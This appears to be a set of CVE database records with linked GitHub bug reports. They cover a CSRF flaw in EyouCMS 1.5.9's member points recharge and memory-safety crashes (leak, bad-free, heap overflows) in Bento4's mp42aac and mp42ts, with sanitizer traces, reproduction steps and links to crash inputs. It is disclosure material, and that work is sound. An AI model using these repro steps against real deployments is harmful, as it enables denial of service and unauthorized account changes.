[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.5.9:*:*:*:*:*:*:*", "matchCriteriaId": "42A15197-E862-429C-8ECB-79D0B850C9C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/weng-xianhu/eyoucms/issues/27#issue-1410014422
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
A security vulnerability exists in EyouCMS V1.5.9 in the backend, Members Center, Editing Membership, and Points Top-up. 1. Enter the background - > member center - > edit member - > points recharge, as shown in the figure: ![图片1](https://user-images.githubusercontent.com/83074322/195964323-3288f8b0-e780-437d-9c63-1e25c067eab1.png) ![图片2](https://user-images.githubusercontent.com/83074322/195964342-904da99b-bdfe-4375-974e-e923cea7985a.png) ![图片3](https://user-images.githubusercontent.com/83074322/195964356-08f79cf5-20a0-49b8-972b-1f47fc179c59.png) 2. Grab the recharge request package and construct it, as shown below: ![图片4](https://user-images.githubusercontent.com/83074322/195964429-a9c2808a-4efb-4b44-a271-0f920cfc05f0.png) 3. Open and enter the background page in the browser to view the user test01 points: ![图片5](https://user-images.githubusercontent.com/83074322/195964638-664471b2-3451-439d-906d-431a112d3bb8.png) ![图片6](https://user-images.githubusercontent.com/83074322/195964650-442b99ed-48d5-4e7a-b458-f31007d5fa8e.png) 4. Click on the constructed web page: ![图片7](https://user-images.githubusercontent.com/83074322/195964694-a464b84f-9885-4e48-b67a-e3ce2f03d5ac.png) ![图片8](https://user-images.githubusercontent.com/83074322/195964698-6301f510-f92c-4a72-883d-018e6a552ab2.png) The figure above shows the page that automatically jumps after successful execution to check whether the points have increased: ![图片9](https://user-images.githubusercontent.com/83074322/195964748-c117eb92-aa8b-4c98-beb4-af9abea17648.png) ![图片10](https://user-images.githubusercontent.com/83074322/195964751-6fee8260-a292-4282-a26f-aea75c146c11.png)
EyouCMS v1.5.9 has a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/weng-xianhu/eyoucms/issues/27/comments
1
2022-10-15T02:26:03Z
2023-02-28T02:38:51Z
https://github.com/weng-xianhu/eyoucms/issues/27
1,410,014,422
27
CVE-2022-43032
2022-10-19T14:15:09.853
An issue was discovered in Bento4 v1.6.0-639. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp, as demonstrated by mp42aac.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/763" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/763
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing memory leaks. Here is the ASAN mode output: ================================================================= ==19530==ERROR: LeakSanitizer: detected memory leaks Direct leak of 80 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x5ad493 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) /root/Bento4/Source/C++/Core/Ap4DescriptorFactory.cpp:85 Indirect leak of 112 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x5ad7a9 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) /root/Bento4/Source/C++/Core/Ap4DescriptorFactory.cpp:127 Indirect leak of 72 byte(s) in 3 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x604f8b in AP4_List<AP4_Descriptor>::Add(AP4_Descriptor*) /root/Bento4/Source/C++/Core/Ap4List.h:160 #2 0x604f8b in AP4_ObjectDescriptor::AP4_ObjectDescriptor(AP4_ByteStream&, unsigned char, unsigned int, unsigned int) /root/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:103 Indirect leak of 32 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x5ad532 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) /root/Bento4/Source/C++/Core/Ap4DescriptorFactory.cpp:115 Indirect leak of 25 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x415b81 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x415b81 in AP4_DataBuffer::SetDataSize(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: 321 byte(s) leaked in 9 allocation(s). ### Crash Input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42aac-ml-00 ### Verification steps: git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac mp42aac-ml-00 /dev/null ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Memory leaks with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/763/comments
0
2022-09-19T06:18:05Z
2022-09-19T06:18:05Z
https://github.com/axiomatic-systems/Bento4/issues/763
1,377,456,877
763
CVE-2022-43033
2022-10-19T14:15:09.897
An issue was discovered in Bento4 1.6.0-639. There is a bad free in the component AP4_HdlrAtom::~AP4_HdlrAtom() which allows attackers to cause a Denial of Service (DoS) via a crafted input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/765" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/765
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing attempting free on address which was not malloc. Here is the ASAN mode output: ==9252==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x60200000ef50 in thread T0 #0 0x7ffff6f03d0a in operator delete[](void*) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99d0a) #1 0x5c124b in AP4_HdlrAtom::~AP4_HdlrAtom() /root/Bento4/Source/C++/Core/Ap4HdlrAtom.h:61 #2 0x5c124b in AP4_HdlrAtom::~AP4_HdlrAtom() /root/Bento4/Source/C++/Core/Ap4HdlrAtom.h:61 #3 0x4e7e4b in AP4_List<AP4_Atom>::DeleteReferences() /root/Bento4/Source/C++/Core/Ap4List.h:476 #4 0x4e7e4b in AP4_AtomParent::~AP4_AtomParent() /root/Bento4/Source/C++/Core/Ap4Atom.cpp:516 #5 0x57a323 in AP4_ContainerAtom::~AP4_ContainerAtom() /root/Bento4/Source/C++/Core/Ap4ContainerAtom.h:48 #6 0x57a323 in AP4_ContainerAtom::~AP4_ContainerAtom() /root/Bento4/Source/C++/Core/Ap4ContainerAtom.h:48 #7 0x4e7e4b in AP4_List<AP4_Atom>::DeleteReferences() /root/Bento4/Source/C++/Core/Ap4List.h:476 #8 0x4e7e4b in AP4_AtomParent::~AP4_AtomParent() /root/Bento4/Source/C++/Core/Ap4Atom.cpp:516 #9 0x417b8d in AP4_File::~AP4_File() /root/Bento4/Source/C++/Core/Ap4File.cpp:84 #10 0x417b8d in AP4_File::~AP4_File() /root/Bento4/Source/C++/Core/Ap4File.cpp:88 #11 0x4043f2 in main /root/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:303 #12 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #13 0x408508 in _start (/root/Bento4/mp42aac+0x408508) 0x60200000ef50 is located 0 bytes inside of 1-byte region [0x60200000ef50,0x60200000ef51) allocated by thread T0 here: #0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x48ac75 in AP4_String::Assign(char const*, unsigned int) /root/Bento4/Source/C++/Core/Ap4String.cpp:165 #2 0x48ac75 in AP4_String::operator=(char const*) /root/Bento4/Source/C++/Core/Ap4String.cpp:123 SUMMARY: AddressSanitizer: bad-free ??:0 operator delete[](void*) ==9252==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42aac-badfree ### Validation steps git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac mp42aac-badfree /dev/null ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Bad-free with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/765/comments
0
2022-09-19T06:29:50Z
2023-05-29T02:51:08Z
https://github.com/axiomatic-systems/Bento4/issues/765
1,377,466,423
765
CVE-2022-43034
2022-10-19T14:15:09.943
An issue was discovered in Bento4 v1.6.0-639. There is a heap buffer overflow vulnerability in the AP4_BitReader::SkipBits(unsigned int) function in mp42ts.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/764" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/764
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output: ==10897==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ec3c at pc 0x0000004a9771 bp 0x7fffffffb150 sp 0x7fffffffb140 READ of size 4 at 0x60300000ec3c thread T0 #0 0x4a9770 in AP4_BitReader::SkipBits(unsigned int) /root/Bento4/Source/C++/Core/Ap4Utils.cpp:564 #1 0x53f5c5 in AP4_Dac4Atom::AP4_Dac4Atom(unsigned int, unsigned char const*) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:396 #2 0x543230 in AP4_Dac4Atom::Create(unsigned int, AP4_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:58 #3 0x4f7503 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:776 #4 0x4fc596 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #5 0x51cd08 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #6 0x4826d1 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115 #7 0x4826d1 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420 #8 0x5d736d in AP4_EncaSampleEntry::AP4_EncaSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4Protection.cpp:74 #9 0x4f4a3c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:298 #10 0x4fc596 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #11 0x614618 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101 #12 0x615fc0 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57 #13 0x4f838e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458 #14 0x4fc596 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #15 0x51ac42 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #16 0x51ac42 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #17 0x51b986 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #18 0x4f5833 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #19 0x4fc596 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #20 0x51ac42 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #21 0x51ac42 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #22 0x51b986 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #23 0x4f5833 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #24 0x4fc596 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #25 0x51ac42 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #26 0x51ac42 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #27 0x51b986 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #28 0x4f5833 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #29 0x4fc596 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #30 0x51ac42 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #31 0x51ac42 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #32 0x49cfb2 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4TrakAtom.cpp:165 #33 0x4f7709 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4TrakAtom.h:58 #34 0x4f7709 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:413 #35 0x4fc596 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #36 0x51ac42 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #37 0x51ac42 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #38 0x430fac in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4MoovAtom.cpp:80 #39 0x4f5430 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4MoovAtom.h:56 #40 0x4f5430 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:393 #41 0x4fb65a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #42 0x4fb65a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #43 0x41c6af in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:104 #44 0x41c6af in AP4_File::AP4_File(AP4_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78 #45 0x404446 in main /root/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511 #46 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #47 0x40ae38 in _start (/root/Bento4/mp42ts+0x40ae38) 0x60300000ec3c is located 0 bytes to the right of 28-byte region [0x60300000ec20,0x60300000ec3c) allocated by thread T0 here: #0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x419645 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x419645 in AP4_DataBuffer::SetBufferSize(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Bento4/Source/C++/Core/Ap4Utils.cpp:564 AP4_BitReader::SkipBits(unsigned int) Shadow bytes around the buggy address: 0x0c067fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9d80: fa fa fa fa 00 00 00[04]fa fa 00 00 00 02 fa fa 0x0c067fff9d90: 00 00 00 02 fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9da0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9db0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9dc0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9dd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==10897==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42ts-hbo-00 ### Validation steps git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42ts mp42ts-hbo-00 /dev/null ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Heap-buffer-overflow with ASAN in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/764/comments
0
2022-09-19T06:24:55Z
2022-09-19T06:24:55Z
https://github.com/axiomatic-systems/Bento4/issues/764
1,377,462,592
764
CVE-2022-43035
2022-10-19T14:15:09.990
An issue was discovered in Bento4 v1.6.0-639. There is a heap-buffer-overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/762" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/762
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: Thanks for your fix of issue #751 In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output: ==27304==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ed28 at pc 0x0000005a64d9 bp 0x7fffffffb290 sp 0x7fffffffb280 READ of size 1 at 0x60300000ed28 thread T0 #0 0x5a64d8 in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) /root/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161 #1 0x5a6a62 in AP4_Dec3Atom::Create(unsigned int, AP4_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:56 #2 0x508887 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:769 #3 0x50ecb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #4 0x579928 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #5 0x480e69 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115 #6 0x480e69 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420 #7 0x480e69 in AP4_Eac3SampleEntry::AP4_Eac3SampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:752 #8 0x508d6b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:338 #9 0x50ecb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x490228 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x491bd0 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x50aaae in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x50ecb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, 